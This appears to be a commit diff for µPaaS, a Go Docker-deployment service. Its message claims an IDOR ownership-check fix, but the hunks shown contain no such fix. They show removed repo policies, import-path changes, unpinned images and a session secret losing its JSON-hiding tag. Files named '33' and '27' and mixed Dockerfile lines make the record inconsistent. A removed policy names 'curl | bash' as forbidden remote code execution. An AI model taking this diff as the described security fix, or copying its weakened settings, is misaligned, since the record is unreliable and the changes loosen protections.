fix: add ownership verification on env var, label, volume, and port deletion

Verify that the resource's AppID matches the URL path app ID before allowing deletion. Without this check, any authenticated user could delete resources belonging to any app by providing the target resource's ID in the URL regardless of the app ID in the path (IDOR vulnerability). Closes #19
test: add IDOR tests for resource deletion ownership verification
2026-02-15 20:52:59 -08:00 · 2026-02-15 20:52:19 -08:00
95 changed files with 1397 additions and 8387 deletions
--- a/.dockerignore
+++ b/.dockerignore
@@ -1,10 +0,0 @@
 .git
 bin/
 .editorconfig
 .vscode/
 .idea/
 *.test
 LICENSE
 CONVENTIONS.md
 REPO_POLICIES.md
 README.md
--- a/.editorconfig
+++ b/.editorconfig
@@ -1,15 +0,0 @@
 root = true
 [*]
 charset = utf-8
 end_of_line = lf
 insert_final_newline = true
 trim_trailing_whitespace = true
 indent_style = space
 indent_size = 2
 [*.go]
 indent_style = tab
 [Makefile]
 indent_style = tab
--- a/.gitea/workflows/check.yml
+++ b/.gitea/workflows/check.yml
@@ -1,16 +0,0 @@
 name: Check
 on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
 jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4, 2024-10-13
      - name: Build (runs make check inside Dockerfile)
        run: docker build .
--- a/.gitignore
+++ b/.gitignore
@@ -1,31 +0,0 @@
 # OS
 .DS_Store
 Thumbs.db
 # Editors
 *.swp
 *.swo
 *~
 *.bak
 .idea/
 .vscode/
 *.sublime-*
 # Node
 node_modules/
 # Environment / secrets
 .env
 .env.*
 *.pem
 *.key
 # Go
 bin/
 *.exe
 *.exe~
 *.dll
 *.so
 *.dylib
 *.test
 *.out
--- a/33
+++ b/33
@@ -1,37 +1,26 @@
-# Lint stage — fast feedback on formatting and lint issues
+# Build stage
-# golangci/golangci-lint:v2.10.1
+FROM golang:1.25-alpine AS builder
 FROM golangci/golangci-lint@sha256:ea84d14c2fef724411be7dc45e09e6ef721d748315252b02df19a7e3113ee763 AS lint
 WORKDIR /src
 COPY go.mod go.sum ./
 RUN go mod download
 COPY . .
 RUN make fmt-check
 RUN make lint
 # Build stage — tests and compilation
 # golang:1.25-alpine
 FROM golang@sha256:f6751d823c26342f9506c03797d2527668d095b0a15f1862cddb4d927a7a4ced AS builder
 # Force BuildKit to run the lint stage by creating a stage dependency
 COPY --from=lint /src/go.sum /dev/null
 RUN apk add --no-cache git make gcc musl-dev
 # Install golangci-lint v2
 RUN go install github.com/golangci/golangci-lint/v2/cmd/golangci-lint@latest
 RUN go install golang.org/x/tools/cmd/goimports@latest
 WORKDIR /src
 COPY go.mod go.sum ./
 RUN go mod download
 COPY . .
-RUN make test
+# Run all checks - build fails if any check fails
 RUN make check
 # Build the binary
 RUN make build
 # Runtime stage
-# alpine:3.19
+FROM alpine:3.19
 FROM alpine@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1
 RUN apk add --no-cache ca-certificates tzdata git openssh-client docker-cli
--- a/27
+++ b/27
@@ -1,4 +1,4 @@
-.PHONY: all build lint fmt fmt-check test check clean docker hooks
+.PHONY: all build lint fmt test check clean
 BINARY := upaasd
 VERSION := $(shell git describe --tags --always --dirty 2>/dev/null || echo "dev")
@@ -18,26 +18,21 @@ fmt:
 	goimports -w .
 	npx prettier --write --tab-width 4 static/js/*.js
 fmt-check:
 	@test -z "$$(gofmt -l .)" || (echo "Files not formatted:" && gofmt -l . && exit 1)
 test:
-	go test -v -race -cover -timeout 30s ./...
+	go test -v -race -cover ./...
 # Check runs all validation without making changes
 # Used by CI and Docker build - fails if anything is wrong
-check: fmt-check lint test
+check:
 	@echo "==> Checking formatting..."
 	@test -z "$$(gofmt -l .)" || (echo "Files not formatted:" && gofmt -l . && exit 1)
 	@echo "==> Running linter..."
 	golangci-lint run --config .golangci.yml ./...
 	@echo "==> Running tests..."
 	go test -v -race ./...
 	@echo "==> Building..."
 	go build -ldflags "$(LDFLAGS)" -o /dev/null ./cmd/upaasd
 	@echo "==> All checks passed!"
 docker:
 	docker build .
 hooks:
 	@echo "Installing pre-commit hook..."
 	@mkdir -p .git/hooks
 	@printf '#!/bin/sh\nmake check\n' > .git/hooks/pre-commit
 	@chmod +x .git/hooks/pre-commit
 	@echo "Pre-commit hook installed."
 clean:
 	rm -rf bin/
--- a/README.md
+++ b/README.md
@@ -111,13 +111,10 @@ chi Router ──► Middleware Stack ──► Handler
 ```bash
 make fmt      # Format code
 make fmt-check # Check formatting (read-only, fails if unformatted)
 make lint     # Run comprehensive linting
-make test      # Run tests with race detection (30s timeout)
+make test     # Run tests with race detection
-make check     # Verify everything passes (fmt-check, lint, test)
+make check    # Verify everything passes (lint, test, build, format)
 make build    # Build binary
 make docker    # Build Docker image
 make hooks     # Install pre-commit hook (runs make check)
 ```
 ### Commit Requirements
@@ -160,8 +157,8 @@ Environment variables:
 | Variable | Description | Default |
 |----------|-------------|---------|
 | `PORT` | HTTP listen port | 8080 |
-| `UPAAS_DATA_DIR` | Data directory for SQLite and keys | `./data` (local dev only — use absolute path for Docker) |
+| `UPAAS_DATA_DIR` | Data directory for SQLite and keys | ./data |
-| `UPAAS_HOST_DATA_DIR` | Host path for DATA_DIR (when running in container) | *(none — must be set to an absolute path)* |
+| `UPAAS_HOST_DATA_DIR` | Host path for DATA_DIR (when running in container) | same as DATA_DIR |
 | `UPAAS_DOCKER_HOST` | Docker socket path | unix:///var/run/docker.sock |
 | `DEBUG` | Enable debug logging | false |
 | `SENTRY_DSN` | Sentry error reporting DSN | "" |
@@ -179,35 +176,8 @@ docker run -d \
  upaas
 ```
-### Docker Compose
+**Important**: When running µPaaS inside a container, set `UPAAS_HOST_DATA_DIR` to the host path
-
+that maps to `UPAAS_DATA_DIR`. This is required for Docker bind mounts during builds to work correctly.
 ```yaml
 services:
  upaas:
    build: .
    restart: unless-stopped
    ports:
      - "8080:8080"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - ${HOST_DATA_DIR}:/var/lib/upaas
    environment:
      - UPAAS_HOST_DATA_DIR=${HOST_DATA_DIR}
      # Optional: uncomment to enable debug logging
      # - DEBUG=true
      # Optional: Sentry error reporting
      # - SENTRY_DSN=https://...
      # Optional: Prometheus metrics auth
      # - METRICS_USERNAME=prometheus
      # - METRICS_PASSWORD=secret
 ```
 **Important**: You **must** set `HOST_DATA_DIR` to an **absolute path** on the host before running
 `docker compose up`. This value is bind-mounted into the container and passed as `UPAAS_HOST_DATA_DIR`
 so that Docker bind mounts during builds resolve correctly. Relative paths (e.g. `./data`) will break
 container builds because the Docker daemon resolves paths relative to the host, not the container.
 Example: `HOST_DATA_DIR=/srv/upaas/data docker compose up -d`
 Session secrets are automatically generated on first startup and persisted to `$UPAAS_DATA_DIR/session.key`.
--- a/REPO_POLICIES.md
+++ b/REPO_POLICIES.md
@@ -1,188 +0,0 @@
 ---
 title: Repository Policies
 last_modified: 2026-02-22
 ---
 This document covers repository structure, tooling, and workflow standards. Code
 style conventions are in separate documents:
 - [Code Styleguide](https://git.eeqj.de/sneak/prompts/raw/branch/main/prompts/CODE_STYLEGUIDE.md)
  (general, bash, Docker)
 - [Go](https://git.eeqj.de/sneak/prompts/raw/branch/main/prompts/CODE_STYLEGUIDE_GO.md)
 - [JavaScript](https://git.eeqj.de/sneak/prompts/raw/branch/main/prompts/CODE_STYLEGUIDE_JS.md)
 - [Python](https://git.eeqj.de/sneak/prompts/raw/branch/main/prompts/CODE_STYLEGUIDE_PYTHON.md)
 - [Go HTTP Server Conventions](https://git.eeqj.de/sneak/prompts/raw/branch/main/prompts/GO_HTTP_SERVER_CONVENTIONS.md)
 ---
 - Cross-project documentation (such as this file) must include
  `last_modified: YYYY-MM-DD` in the YAML front matter so it can be kept in sync
  with the authoritative source as policies evolve.
 - **ALL external references must be pinned by cryptographic hash.** This
  includes Docker base images, Go modules, npm packages, GitHub Actions, and
  anything else fetched from a remote source. Version tags (`@v4`, `@latest`,
  `:3.21`, etc.) are server-mutable and therefore remote code execution
  vulnerabilities. The ONLY acceptable way to reference an external dependency
  is by its content hash (Docker `@sha256:...`, Go module hash in `go.sum`, npm
  integrity hash in lockfile, GitHub Actions `@<commit-sha>`). No exceptions.
  This also means never `curl | bash` to install tools like pyenv, nvm, rustup,
  etc. Instead, download a specific release archive from GitHub, verify its hash
  (hardcoded in the Dockerfile or script), and only then install. Unverified
  install scripts are arbitrary remote code execution. This is the single most
  important rule in this document. Double-check every external reference in
  every file before committing. There are zero exceptions to this rule.
 - Every repo with software must have a root `Makefile` with these targets:
  `make test`, `make lint`, `make fmt` (writes), `make fmt-check` (read-only),
  `make check` (prereqs: `test`, `lint`, `fmt-check`), `make docker`, and
  `make hooks` (installs pre-commit hook). A model Makefile is at
  `https://git.eeqj.de/sneak/prompts/raw/branch/main/Makefile`.
 - Always use Makefile targets (`make fmt`, `make test`, `make lint`, etc.)
  instead of invoking the underlying tools directly. The Makefile is the single
  source of truth for how these operations are run.
 - The Makefile is authoritative documentation for how the repo is used. Beyond
  the required targets above, it should have targets for every common operation:
  running a local development server (`make run`, `make dev`), re-initializing
  or migrating the database (`make db-reset`, `make migrate`), building
  artifacts (`make build`), generating code, seeding data, or anything else a
  developer would do regularly. If someone checks out the repo and types
  `make<tab>`, they should see every meaningful operation available. A new
  contributor should be able to understand the entire development workflow by
  reading the Makefile.
 - Every repo should have a `Dockerfile`. All Dockerfiles must run `make check`
  as a build step so the build fails if the branch is not green. For non-server
  repos, the Dockerfile should bring up a development environment and run
  `make check`. For server repos, `make check` should run as an early build
  stage before the final image is assembled.
 - Every repo should have a Gitea Actions workflow (`.gitea/workflows/`) that
  runs `docker build .` on push. Since the Dockerfile already runs `make check`,
  a successful build implies all checks pass.
 - Use platform-standard formatters: `black` for Python, `prettier` for
  JS/CSS/Markdown/HTML, `go fmt` for Go. Always use default configuration with
  two exceptions: four-space indents (except Go), and `proseWrap: always` for
  Markdown (hard-wrap at 80 columns). Documentation and writing repos (Markdown,
  HTML, CSS) should also have `.prettierrc` and `.prettierignore`.
 - Pre-commit hook: `make check` if local testing is possible, otherwise
  `make lint && make fmt-check`. The Makefile should provide a `make hooks`
  target to install the pre-commit hook.
 - All repos with software must have tests that run via the platform-standard
  test framework (`go test`, `pytest`, `jest`/`vitest`, etc.). If no meaningful
  tests exist yet, add the most minimal test possible — e.g. importing the
  module under test to verify it compiles/parses. There is no excuse for
  `make test` to be a no-op.
 - `make test` must complete in under 20 seconds. Add a 30-second timeout in the
  Makefile.
 - Docker builds must complete in under 5 minutes.
 - `make check` must not modify any files in the repo. Tests may use temporary
  directories.
 - `main` must always pass `make check`, no exceptions.
 - Never commit secrets. `.env` files, credentials, API keys, and private keys
  must be in `.gitignore`. No exceptions.
 - `.gitignore` should be comprehensive from the start: OS files (`.DS_Store`),
  editor files (`.swp`, `*~`), language build artifacts, and `node_modules/`.
  Fetch the standard `.gitignore` from
  `https://git.eeqj.de/sneak/prompts/raw/branch/main/.gitignore` when setting up
  a new repo.
 - Never use `git add -A` or `git add .`. Always stage files explicitly by name.
 - Never force-push to `main`.
 - Make all changes on a feature branch. You can do whatever you want on a
  feature branch.
 - `.golangci.yml` is standardized and must _NEVER_ be modified by an agent, only
  manually by the user. Fetch from
  `https://git.eeqj.de/sneak/prompts/raw/branch/main/.golangci.yml`.
 - When pinning images or packages by hash, add a comment above the reference
  with the version and date (YYYY-MM-DD).
 - Use `yarn`, not `npm`.
 - Write all dates as YYYY-MM-DD (ISO 8601).
 - Simple projects should be configured with environment variables.
 - Dockerized web services listen on port 8080 by default, overridable with
  `PORT`.
 - `README.md` is the primary documentation. Required sections:
    - **Description**: First line must include the project name, purpose,
      category (web server, SPA, CLI tool, etc.), license, and author. Example:
      "µPaaS is an MIT-licensed Go web application by @sneak that receives
      git-frontend webhooks and deploys applications via Docker in realtime."
    - **Getting Started**: Copy-pasteable install/usage code block.
    - **Rationale**: Why does this exist?
    - **Design**: How is the program structured?
    - **TODO**: Update meticulously, even between commits. When planning, put
      the todo list in the README so a new agent can pick up where the last one
      left off.
    - **License**: MIT, GPL, or WTFPL. Ask the user for new projects. Include a
      `LICENSE` file in the repo root and a License section in the README.
    - **Author**: [@sneak](https://sneak.berlin).
 - First commit of a new repo should contain only `README.md`.
 - Go module root: `sneak.berlin/go/<name>`. Always run `go mod tidy` before
  committing.
 - Use SemVer.
 - Database migrations live in `internal/db/migrations/` and must be embedded in
  the binary.
  - `000_migration.sql` — contains ONLY the creation of the migrations tracking
    table itself. Nothing else.
  - `001_schema.sql` — the full application schema.
  - **Pre-1.0.0:** never add additional migration files (002, 003, etc.). There
    is no installed base to migrate. Edit `001_schema.sql` directly.
  - **Post-1.0.0:** add new numbered migration files for each schema change.
    Never edit existing migrations after release.
 - All repos should have an `.editorconfig` enforcing the project's indentation
  settings.
 - Avoid putting files in the repo root unless necessary. Root should contain
  only project-level config files (`README.md`, `Makefile`, `Dockerfile`,
  `LICENSE`, `.gitignore`, `.editorconfig`, `REPO_POLICIES.md`, and
  language-specific config). Everything else goes in a subdirectory. Canonical
  subdirectory names:
    - `bin/` — executable scripts and tools
    - `cmd/` — Go command entrypoints
    - `configs/` — configuration templates and examples
    - `deploy/` — deployment manifests (k8s, compose, terraform)
    - `docs/` — documentation and markdown (README.md stays in root)
    - `internal/` — Go internal packages
    - `internal/db/migrations/` — database migrations
    - `pkg/` — Go library packages
    - `share/` — systemd units, data files
    - `static/` — static assets (images, fonts, etc.)
    - `web/` — web frontend source
 - When setting up a new repo, files from the `prompts` repo may be used as
  templates. Fetch them from
  `https://git.eeqj.de/sneak/prompts/raw/branch/main/<path>`.
 - New repos must contain at minimum:
    - `README.md`, `.git`, `.gitignore`, `.editorconfig`
    - `LICENSE`, `REPO_POLICIES.md` (copy from the `prompts` repo)
    - `Makefile`
    - `Dockerfile`, `.dockerignore`
    - `.gitea/workflows/check.yml`
    - Go: `go.mod`, `go.sum`, `.golangci.yml`
    - JS: `package.json`, `yarn.lock`, `.prettierrc`, `.prettierignore`
    - Python: `pyproject.toml`
--- a/TODO.md
+++ b/TODO.md
@@ -0,0 +1,312 @@
 # UPAAS Implementation Plan
 ## Feature Roadmap
 ### Core Infrastructure
 - [x] Uber fx dependency injection
 - [x] Chi router integration
 - [x] Structured logging (slog) with TTY detection
 - [x] Configuration via Viper (env vars, config files)
 - [x] SQLite database with embedded migrations
 - [x] Embedded templates (html/template)
 - [x] Embedded static assets (Tailwind CSS, JS)
 - [x] Server startup (`Server.Run()`)
 - [x] Graceful shutdown (`Server.Shutdown()`)
 - [x] Route wiring (`SetupRoutes()`)
 ### Authentication & Authorization
 - [x] Single admin user model
 - [x] Argon2id password hashing
 - [x] Initial setup flow (create admin on first run)
 - [x] Cookie-based session management (gorilla/sessions)
 - [x] Session middleware for protected routes
 - [x] Login/logout handlers
 - [ ] API token authentication (for JSON API)
 ### App Management
 - [x] Create apps with name, repo URL, branch, Dockerfile path
 - [x] Edit app configuration
 - [x] Delete apps (cascades to related entities)
 - [x] List all apps on dashboard
 - [x] View app details
 - [x] Per-app SSH keypair generation (Ed25519)
 - [x] Per-app webhook secret (UUID)
 ### Container Configuration
 - [x] Environment variables (add, delete per app)
 - [x] Docker labels (add, delete per app)
 - [x] Volume mounts (add, delete per app, with read-only option)
 - [x] Docker network configuration per app
 - [ ] Edit existing environment variables
 - [ ] Edit existing labels
 - [ ] Edit existing volume mounts
 - [ ] CPU/memory resource limits
 ### Deployment Pipeline
 - [x] Manual deploy trigger from UI
 - [x] Repository cloning via Docker git container
 - [x] SSH key authentication for private repos
 - [x] Docker image building with configurable Dockerfile
 - [x] Container creation with env vars, labels, volumes
 - [x] Old container removal before new deployment
 - [x] Deployment status tracking (building, deploying, success, failed)
 - [x] Deployment logs storage
 - [x] View deployment history per app
 - [x] Container logs viewing
 - [ ] Deployment rollback to previous image
 - [ ] Deployment cancellation
 ### Manual Container Controls
 - [x] Restart container
 - [x] Stop container
 - [x] Start stopped container
 ### Webhook Integration
 - [x] Gitea webhook endpoint (`/webhook/:secret`)
 - [x] Push event parsing
 - [x] Branch extraction from refs
 - [x] Branch matching (only deploy configured branch)
 - [x] Webhook event audit log
 - [x] Automatic deployment on matching webhook
 - [ ] Webhook event history UI
 - [ ] GitHub webhook support
 - [ ] GitLab webhook support
 ### Health Monitoring
 - [x] Health check endpoint (`/health`)
 - [x] Application uptime tracking
 - [x] Docker container health status checking
 - [x] Post-deployment health verification (60s delay)
 - [ ] Custom health check commands per app
 ### Notifications
 - [x] ntfy integration (HTTP POST)
 - [x] Slack-compatible webhook integration
 - [x] Build start/success/failure notifications
 - [x] Deploy success/failure notifications
 - [x] Priority mapping for notification urgency
 ### Observability
 - [x] Request logging middleware
 - [x] Request ID generation
 - [x] Sentry error reporting (optional)
 - [x] Prometheus metrics endpoint (optional, with basic auth)
 - [ ] Structured logging for all operations
 - [ ] Deployment count/duration metrics
 - [ ] Container health status metrics
 - [ ] Webhook event metrics
 - [ ] Audit log table for user actions
 ### API
 - [ ] JSON API (`/api/v1/*`)
 - [ ] List apps endpoint
 - [ ] Get app details endpoint
 - [ ] Create app endpoint
 - [ ] Delete app endpoint
 - [ ] Trigger deploy endpoint
 - [ ] List deployments endpoint
 - [ ] API documentation
 ### UI Features
 - [x] Server-rendered HTML templates
 - [x] Dashboard with app list
 - [x] App creation form
 - [x] App detail view with all configurations
 - [x] App edit form
 - [x] Deployment history page
 - [x] Login page
 - [x] Setup page
 - [ ] Container logs page
 - [ ] Webhook event history page
 - [ ] Settings page (webhook secret, SSH public key)
 - [ ] Real-time deployment log streaming (WebSocket/SSE)
 ### Future Considerations
 - [ ] Multi-user support with roles
 - [ ] Private Docker registry authentication
 - [ ] Scheduled deployments
 - [ ] Backup/restore of app configurations
 ---
 ## Phase 1: Critical (Application Cannot Start)
 ### 1.1 Server Startup Infrastructure
 - [x] Implement `Server.Run()` in `internal/server/server.go`
  - Start HTTP server with configured address/port
  - Handle TLS if configured
  - Block until shutdown signal received
 - [x] Implement `Server.Shutdown()` in `internal/server/server.go`
  - Graceful shutdown with context timeout
  - Close database connections
  - Stop running containers gracefully (optional)
 - [x] Implement `SetupRoutes()` in `internal/server/routes.go`
  - Wire up chi router with all handlers
  - Apply middleware (logging, auth, CORS, metrics)
  - Define public vs protected route groups
  - Serve static assets and templates
 ### 1.2 Route Configuration
 ```
 Public Routes:
  GET  /health
  GET  /setup, POST /setup
  GET  /login, POST /login
  POST /webhook/:secret
 Protected Routes (require auth):
  GET  /logout
  GET  /dashboard
  GET  /apps/new, POST /apps
  GET  /apps/:id, POST /apps/:id, DELETE /apps/:id
  GET  /apps/:id/edit, POST /apps/:id/edit
  GET  /apps/:id/deployments
  GET  /apps/:id/logs
  POST /apps/:id/env-vars, DELETE /apps/:id/env-vars/:id
  POST /apps/:id/labels, DELETE /apps/:id/labels/:id
  POST /apps/:id/volumes, DELETE /apps/:id/volumes/:id
  POST /apps/:id/deploy
 ```
 ## Phase 2: High Priority (Core Functionality Gaps)
 ### 2.1 Container Logs
 - [x] Implement `HandleAppLogs()` in `internal/handlers/app.go`
  - Fetch logs via Docker API (`ContainerLogs`)
  - Support tail parameter (last N lines)
  - Stream logs with SSE or chunked response
 - [x] Add Docker client method `GetContainerLogs(containerID, tail int) (io.Reader, error)`
 ### 2.2 Manual Container Controls
 - [x] Add `POST /apps/:id/restart` endpoint
  - Stop and start container
  - Record restart in deployment log
 - [x] Add `POST /apps/:id/stop` endpoint
  - Stop container without deleting
  - Update app status
 - [x] Add `POST /apps/:id/start` endpoint
  - Start stopped container
  - Run health check
 ## Phase 3: Medium Priority (UX Improvements)
 ### 3.1 Edit Operations for Related Entities
 - [ ] Add `PUT /apps/:id/env-vars/:id` endpoint
  - Update existing environment variable value
  - Trigger container restart with new env
 - [ ] Add `PUT /apps/:id/labels/:id` endpoint
  - Update existing Docker label
 - [ ] Add `PUT /apps/:id/volumes/:id` endpoint
  - Update volume mount paths
  - Validate paths before saving
 ### 3.2 Deployment Rollback
 - [ ] Add `previous_image_id` column to apps table
  - Store last successful image ID before new deploy
 - [ ] Add `POST /apps/:id/rollback` endpoint
  - Stop current container
  - Start container with previous image
  - Create deployment record for rollback
 - [ ] Update deploy service to save previous image before building new one
 ### 3.3 Deployment Cancellation
 - [ ] Add cancellation context to deploy service
 - [ ] Add `POST /apps/:id/deployments/:id/cancel` endpoint
 - [ ] Handle cleanup of partial builds/containers
 ## Phase 4: Lower Priority (Nice to Have)
 ### 4.1 JSON API
 - [ ] Add `/api/v1` route group with JSON responses
 - [ ] Implement API endpoints mirroring web routes:
  - `GET /api/v1/apps` - list apps
  - `POST /api/v1/apps` - create app
  - `GET /api/v1/apps/:id` - get app details
  - `DELETE /api/v1/apps/:id` - delete app
  - `POST /api/v1/apps/:id/deploy` - trigger deploy
  - `GET /api/v1/apps/:id/deployments` - list deployments
 - [ ] Add API token authentication (separate from session auth)
 - [ ] Document API in README
 ### 4.2 Resource Limits
 - [ ] Add `cpu_limit` and `memory_limit` columns to apps table
 - [ ] Add fields to app edit form
 - [ ] Pass limits to Docker container create
 ### 4.3 UI Improvements
 - [ ] Add webhook event history page
  - Show received webhooks per app
  - Display match/no-match status
 - [ ] Add settings page
  - View/regenerate webhook secret
  - View SSH public key
 - [ ] Add real-time deployment log streaming
  - WebSocket or SSE for live build output
 ### 4.4 Observability
 - [ ] Add structured logging for all operations
 - [ ] Add Prometheus metrics for:
  - Deployment count/duration
  - Container health status
  - Webhook events received
 - [ ] Add audit log table for user actions
 ## Phase 5: Future Considerations
 - [ ] Multi-user support with roles
 - [ ] Private Docker registry authentication
 - [ ] Custom health check commands per app
 - [ ] Scheduled deployments
 - [ ] Backup/restore of app configurations
 - [ ] GitHub/GitLab webhook support (in addition to Gitea)
 ---
 ## Implementation Notes
 ### Server.Run() Example
 ```go
 func (s *Server) Run() error {
    s.SetupRoutes()
    srv := &http.Server{
        Addr:    s.config.ListenAddr,
        Handler: s.router,
    }
    go func() {
        <-s.shutdownCh
        ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
        defer cancel()
        srv.Shutdown(ctx)
    }()
    return srv.ListenAndServe()
 }
 ```
 ### SetupRoutes() Structure
 ```go
 func (s *Server) SetupRoutes() {
    r := chi.NewRouter()
    // Global middleware
    r.Use(s.middleware.RequestID)
    r.Use(s.middleware.Logger)
    r.Use(s.middleware.Recoverer)
    // Public routes
    r.Get("/health", s.handlers.HandleHealthCheck())
    r.Get("/login", s.handlers.HandleLoginPage())
    // ...
    // Protected routes
    r.Group(func(r chi.Router) {
        r.Use(s.middleware.SessionAuth)
        r.Get("/dashboard", s.handlers.HandleDashboard())
        // ...
    })
    s.router = r
 }
 ```
--- a/cmd/upaasd/main.go
+++ b/cmd/upaasd/main.go
@@ -4,20 +4,20 @@ package main
 import (
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/docker"
+	"git.eeqj.de/sneak/upaas/internal/docker"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/handlers"
+	"git.eeqj.de/sneak/upaas/internal/handlers"
-	"sneak.berlin/go/upaas/internal/healthcheck"
+	"git.eeqj.de/sneak/upaas/internal/healthcheck"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/middleware"
+	"git.eeqj.de/sneak/upaas/internal/middleware"
-	"sneak.berlin/go/upaas/internal/server"
+	"git.eeqj.de/sneak/upaas/internal/server"
-	"sneak.berlin/go/upaas/internal/service/app"
+	"git.eeqj.de/sneak/upaas/internal/service/app"
-	"sneak.berlin/go/upaas/internal/service/auth"
+	"git.eeqj.de/sneak/upaas/internal/service/auth"
-	"sneak.berlin/go/upaas/internal/service/deploy"
+	"git.eeqj.de/sneak/upaas/internal/service/deploy"
-	"sneak.berlin/go/upaas/internal/service/notify"
+	"git.eeqj.de/sneak/upaas/internal/service/notify"
-	"sneak.berlin/go/upaas/internal/service/webhook"
+	"git.eeqj.de/sneak/upaas/internal/service/webhook"
 	_ "github.com/joho/godotenv/autoload"
 )
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -0,0 +1,20 @@
 services:
  upaas:
    build: .
    restart: unless-stopped
    ports:
      - "8080:8080"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - upaas-data:/var/lib/upaas
    # environment:
      # Optional: uncomment to enable debug logging
      # - DEBUG=true
      # Optional: Sentry error reporting
      # - SENTRY_DSN=https://...
      # Optional: Prometheus metrics auth
      # - METRICS_USERNAME=prometheus
      # - METRICS_PASSWORD=secret
 volumes:
  upaas-data:
--- a/go.mod
+++ b/go.mod
@@ -1,15 +1,13 @@
-module sneak.berlin/go/upaas
+module git.eeqj.de/sneak/upaas
 go 1.25
 require (
 	github.com/99designs/basicauth-go v0.0.0-20230316000542-bf6f9cbbf0f8
 	github.com/docker/docker v27.3.1+incompatible
 	github.com/docker/go-connections v0.6.0
 	github.com/go-chi/chi/v5 v5.2.3
 	github.com/go-chi/cors v1.2.2
 	github.com/google/uuid v1.6.0
 	github.com/gorilla/csrf v1.7.3
 	github.com/gorilla/sessions v1.4.0
 	github.com/joho/godotenv v1.5.1
 	github.com/mattn/go-sqlite3 v1.14.32
@@ -19,7 +17,6 @@ require (
 	github.com/stretchr/testify v1.11.1
 	go.uber.org/fx v1.24.0
 	golang.org/x/crypto v0.46.0
 	golang.org/x/time v0.12.0
 )
 require (
@@ -30,6 +27,7 @@ require (
 	github.com/containerd/log v0.1.0 // indirect
 	github.com/davecgh/go-spew v1.1.1 // indirect
 	github.com/distribution/reference v0.6.0 // indirect
 	github.com/docker/go-connections v0.6.0 // indirect
 	github.com/docker/go-units v0.5.0 // indirect
 	github.com/felixge/httpsnoop v1.0.4 // indirect
 	github.com/fsnotify/fsnotify v1.9.0 // indirect
@@ -75,6 +73,7 @@ require (
 	go.yaml.in/yaml/v3 v3.0.4 // indirect
 	golang.org/x/sys v0.39.0 // indirect
 	golang.org/x/text v0.32.0 // indirect
 	golang.org/x/time v0.12.0 // indirect
 	google.golang.org/protobuf v1.36.10 // indirect
 	gopkg.in/yaml.v3 v3.0.1 // indirect
 	gotest.tools/v3 v3.5.2 // indirect
--- a/go.sum
+++ b/go.sum
@@ -50,8 +50,6 @@ github.com/google/gofuzz v1.2.0 h1:xRy4A+RhZaiKjJ1bPfwQ8sedCA+YS2YcCHW6ec7JMi0=
 github.com/google/gofuzz v1.2.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
 github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
 github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
 github.com/gorilla/csrf v1.7.3 h1:BHWt6FTLZAb2HtWT5KDBf6qgpZzvtbp9QWDRKZMXJC0=
 github.com/gorilla/csrf v1.7.3/go.mod h1:F1Fj3KG23WYHE6gozCmBAezKookxbIvUJT+121wTuLk=
 github.com/gorilla/securecookie v1.1.2 h1:YCIWL56dvtr73r6715mJs5ZvhtnY73hBvEF8kXD8ePA=
 github.com/gorilla/securecookie v1.1.2/go.mod h1:NfCASbcHqRSY+3a8tlWJwsQap2VX5pwzwo4h3eOamfo=
 github.com/gorilla/sessions v1.4.0 h1:kpIYOp/oi6MG/p5PgxApU8srsSw9tuFbt46Lt7auzqQ=
--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -13,8 +13,8 @@ import (
 	"github.com/spf13/viper"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
 )
 // defaultPort is the default HTTP server port.
@@ -51,8 +51,7 @@ type Config struct {
 	MaintenanceMode bool
 	MetricsUsername string
 	MetricsPassword string
-	SessionSecret   string `json:"-"`
+	SessionSecret   string
 	CORSOrigins     string
 	params          *Params
 	log             *slog.Logger
 }
@@ -103,7 +102,6 @@ func setupViper(name string) {
 	viper.SetDefault("METRICS_USERNAME", "")
 	viper.SetDefault("METRICS_PASSWORD", "")
 	viper.SetDefault("SESSION_SECRET", "")
 	viper.SetDefault("CORS_ORIGINS", "")
 }
 func buildConfig(log *slog.Logger, params *Params) (*Config, error) {
@@ -138,7 +136,6 @@ func buildConfig(log *slog.Logger, params *Params) (*Config, error) {
 		MetricsUsername: viper.GetString("METRICS_USERNAME"),
 		MetricsPassword: viper.GetString("METRICS_PASSWORD"),
 		SessionSecret:   viper.GetString("SESSION_SECRET"),
 		CORSOrigins:     viper.GetString("CORS_ORIGINS"),
 		params:          params,
 		log:             log,
 	}
--- a/internal/database/database.go
+++ b/internal/database/database.go
@@ -3,9 +3,7 @@ package database
 import (
 	"context"
 	"crypto/sha256"
 	"database/sql"
 	"encoding/hex"
 	"fmt"
 	"log/slog"
 	"os"
@@ -14,8 +12,8 @@ import (
 	_ "github.com/mattn/go-sqlite3" // SQLite driver
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
 )
 // dataDirPermissions is the file permission for the data directory.
